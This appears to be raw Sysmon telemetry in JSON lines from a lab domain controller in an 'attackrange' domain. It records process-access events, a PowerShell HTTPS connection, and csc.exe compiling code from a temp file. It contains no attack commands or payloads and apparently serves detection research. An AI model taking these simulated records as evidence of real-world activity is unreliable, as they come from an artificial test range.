C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4608,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4609,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4610,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4611,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nSourceProcessId: 5076\r\nSourceThreadId: 4416\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-0010DEE30600}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","SourceProcessId":"5076","SourceThreadId":"4416","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-0010DEE30600}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4612,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.429\r\nProcessGuid: {41C8662E-20BC-5F25-0000-00104D890600}\r\nProcessId: 2608\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50152\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 72.21.81.200\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.429","ProcessGuid":"{41C8662E-20BC-5F25-0000-00104D890600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50152","DestinationIsIpv6":"false","DestinationIp":"72.21.81.200","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4613,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.538\r\nProcessGuid: {41C8662E-20C0-5F25-0000-00106DE70600}\r\nProcessId: 2852\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES7333.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCB439F07C1B4E4E09AB75281793E880DD.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BF-5F25-0000-0020C6C20600}\r\nLogonId: 0x6C2C6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {41C8662E-20C0-5F25-0000-0010DEE30600}\r\nParentProcessId: 4012\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\elpxvu02.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.538","ProcessGuid":"{41C8662E-20C0-5F25-0000-00106DE70600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES7333.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCB439F07C1B4E4E09AB75281793E880DD.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BF-5F25-0000-0020C6C20600}","LogonId":"0x6c2c6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{41C8662E-20C0-5F25-0000-0010DEE30600}","ParentProcessId":"4012","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\elpxvu02.cmdline\"","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4614,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-20C0-5F25-0000-0010DEE30600}\r\nSourceProcessId: 4012\r\nSourceThreadId: 4308\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-00106DE70600}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-20C0-5F25-0000-0010DEE30600}","SourceProcessId":"4012","SourceThreadId":"4308","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-00106DE70600}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4615,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.533\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-00106DE70600}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.533","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-00106DE70600}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
